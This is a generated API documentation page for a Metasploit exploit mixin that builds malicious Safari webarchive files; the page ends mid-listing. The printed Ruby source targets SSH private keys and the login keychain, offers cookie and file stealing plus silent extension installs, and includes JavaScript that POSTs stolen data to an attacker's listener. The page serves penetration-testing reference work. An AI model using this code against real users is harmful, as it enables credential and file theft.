adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Format/Webarchive.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

2092 lines
66 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Format::Webarchive
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Format::Webarchive";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (W)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Format.html" title="Msf::Exploit::Format (module)">Format</a></span></span>
&raquo;
<span class="title">Webarchive</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Format::Webarchive
</h1>
<div class="box_info">
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/format/webarchive.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#apple_extension_url-instance_method" title="#apple_extension_url (instance method)">#<strong>apple_extension_url</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#backend_url-instance_method" title="#backend_url (instance method)">#<strong>backend_url</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Formatted http/https URL of the listener.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#collect_data_uri-instance_method" title="#collect_data_uri (instance method)">#<strong>collect_data_uri</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The path to send data back to.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#default_files-instance_method" title="#default_files (instance method)">#<strong>default_files</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#escape_xml-instance_method" title="#escape_xml (instance method)">#<strong>escape_xml</strong>(input) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Input with dangerous chars replaced with xml entities.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#iframes_container_html-instance_method" title="#iframes_container_html (instance method)">#<strong>iframes_container_html</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Mark up for embedding the iframes for each URL in a place that is invisible to the user.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#injected_js_helpers-instance_method" title="#injected_js_helpers (instance method)">#<strong>injected_js_helpers</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Javascript code, wrapped in script tag, that adds a helper function called “sendData()” that passes the arguments up to the parent frame, where it is sent out to the listener.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#install_extension-instance_method" title="#install_extension (instance method)">#<strong>install_extension</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#message-instance_method" title="#message (instance method)">#<strong>message</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>HTML content that is rendered in the &lt;body&gt; of the webarchive.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#should_steal_files%3F-instance_method" title="#should_steal_files? (instance method)">#<strong>should_steal_files?</strong> &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#steal_default_files-instance_method" title="#steal_default_files (instance method)">#<strong>steal_default_files</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#steal_files-instance_method" title="#steal_files (instance method)">#<strong>steal_files</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Javascript code, wrapped in a script tag, that steals local files and sends them back to the listener.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#urls-instance_method" title="#urls (instance method)">#<strong>urls</strong> &#x21d2; Array&lt;String&gt; </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Of URLs provided by the user.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#webarchive_download_url-instance_method" title="#webarchive_download_url (instance method)">#<strong>webarchive_download_url</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>URL that serves the malicious webarchive.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#webarchive_footer-instance_method" title="#webarchive_footer (instance method)">#<strong>webarchive_footer</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The closing chunk of the webarchive XML code.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#webarchive_header-instance_method" title="#webarchive_header (instance method)">#<strong>webarchive_header</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The first chunk of the webarchive file, containing the WebMainResource.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#webarchive_xml-instance_method" title="#webarchive_xml (instance method)">#<strong>webarchive_xml</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Contents of webarchive as an XML document.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wrap_with_doc-instance_method" title="#wrap_with_doc (instance method)">#<strong>wrap_with_doc</strong>(&amp;blk) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Wraps the result of the block in an HTML5 document and body.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wrap_with_script-instance_method" title="#wrap_with_script (instance method)">#<strong>wrap_with_script</strong>(&amp;blk) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Wraps the result of the block with &lt;script&gt; tags.</p>
</div></span>
</li>
</ul>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="apple_extension_url-instance_method">
#<strong>apple_extension_url</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
100
101
102</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 100</span>
<span class='kw'>def</span> <span class='id identifier rubyid_apple_extension_url'>apple_extension_url</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>https://extensions.apple.com</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="backend_url-instance_method">
#<strong>backend_url</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns formatted http/https URL of the listener.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>formatted http/https URL of the listener</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
330
331
332
333</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 330</span>
<span class='kw'>def</span> <span class='id identifier rubyid_backend_url'>backend_url</span>
<span class='id identifier rubyid_resource'>resource</span> <span class='op'>=</span> <span class='id identifier rubyid_get_resource'>get_resource</span><span class='period'>.</span><span class='id identifier rubyid_end_with?'>end_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>?</span> <span class='id identifier rubyid_get_resource'>get_resource</span><span class='lbracket'>[</span><span class='int'>0</span><span class='comma'>,</span> <span class='id identifier rubyid_get_resource'>get_resource</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rbracket'>]</span> <span class='op'>:</span> <span class='id identifier rubyid_get_resource'>get_resource</span>
<span class='id identifier rubyid_get_uri'>get_uri</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_resource'>resource</span><span class='embexpr_end'>}</span><span class='tstring_content'>/catch</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="collect_data_uri-instance_method">
#<strong>collect_data_uri</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the path to send data back to.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the path to send data back to</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
325
326
327</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 325</span>
<span class='kw'>def</span> <span class='id identifier rubyid_collect_data_uri'>collect_data_uri</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_chomp'>chomp</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^\/</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/</span><span class='tstring_end'>&#39;</span></span><span class='op'>+</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GRABPATH</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="default_files-instance_method">
#<strong>default_files</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
156
157
158
159
160</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 156</span>
<span class='kw'>def</span> <span class='id identifier rubyid_default_files'>default_files</span>
<span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>file:///Users/$USER/.ssh/id_rsa file:///Users/$USER/.ssh/id_rsa.pub </span><span class='tstring_end'>&#39;</span></span><span class='op'>+</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>file:///Users/$USER/Library/Keychains/login.keychain </span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span>
<span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>FILE_URLS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_s'>s</span><span class='op'>|</span> <span class='id identifier rubyid_s'>s</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>$USER</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="escape_xml-instance_method">
#<strong>escape_xml</strong>(input) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns input with dangerous chars replaced with xml entities.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>input</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the unencoded string</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>input with dangerous chars replaced with xml entities</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
352
353
354
355
356</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 352</span>
<span class='kw'>def</span> <span class='id identifier rubyid_escape_xml'>escape_xml</span><span class='lparen'>(</span><span class='id identifier rubyid_input'>input</span><span class='rparen'>)</span>
<span class='id identifier rubyid_input'>input</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&amp;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&amp;amp;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&amp;lt;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&gt;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&amp;gt;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&amp;apos;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\&quot;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&amp;quot;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="iframes_container_html-instance_method">
#<strong>iframes_container_html</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns mark up for embedding the iframes for each URL in a place that is invisible to the user.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>mark up for embedding the iframes for each URL in a place that is invisible to the user</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
94
95
96
97
98</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 94</span>
<span class='kw'>def</span> <span class='id identifier rubyid_iframes_container_html'>iframes_container_html</span>
<span class='id identifier rubyid_wrap_with_doc'>wrap_with_doc</span> <span class='kw'>do</span>
<span class='id identifier rubyid_injected_js_helpers'>injected_js_helpers</span> <span class='op'>+</span> <span class='id identifier rubyid_steal_files'>steal_files</span> <span class='op'>+</span> <span class='id identifier rubyid_install_extension'>install_extension</span> <span class='op'>+</span> <span class='id identifier rubyid_message'>message</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 11</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span><span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The URI to use for this exploit (default is random)</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>FILENAME</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The file name</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>msf.webarchive</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GRABPATH</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The URI to receive the UXSS&#39;ed data</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>grab</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DOWNLOAD_PATH</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The path to download the webarchive</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/msf.webarchive</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>FILE_URLS</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Additional file:// URLs to steal. $USER will be resolved to the username.</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>STEAL_COOKIES</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Enable cookie stealing</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>true</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>STEAL_FILES</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Enable local file stealing</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>true</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>INSTALL_EXTENSION</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Silently install a Safari extensions (requires click)</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXTENSION_URL</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>HTTP URL of a Safari extension to install</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>https://data.getadblock.com/safari/AdBlock.safariextz</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXTENSION_ID</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The ID of the Safari extension to install</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>com.betafish.adblockforsafari-UAMUU4S2D9</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="injected_js_helpers-instance_method">
#<strong>injected_js_helpers</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns javascript code, wrapped in script tag, that adds a helper function called “sendData()” that passes the arguments up to the parent frame, where it is sent out to the listener.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>javascript code, wrapped in script tag, that adds a helper function called “sendData()” that passes the arguments up to the parent frame, where it is sent out to the listener</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/format/webarchive.rb', line 306</span>
<span class='kw'>def</span> <span class='id identifier rubyid_injected_js_helpers'>injected_js_helpers</span>
<span class='id identifier rubyid_wrap_with_script'>wrap_with_script</span> <span class='kw'>do</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
window.sendData = function(key, val) {
var data = {};
data[key] = val;
var x = new XMLHttpRequest;
x.open(&#39;POST&#39;, &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_backend_url'>backend_url</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_collect_data_uri'>collect_data_uri</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, true);
x.setRequestHeader(&#39;Content-type&#39;, &#39;text/plain&#39;)
x.send(JSON.stringify(data));
};
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span>
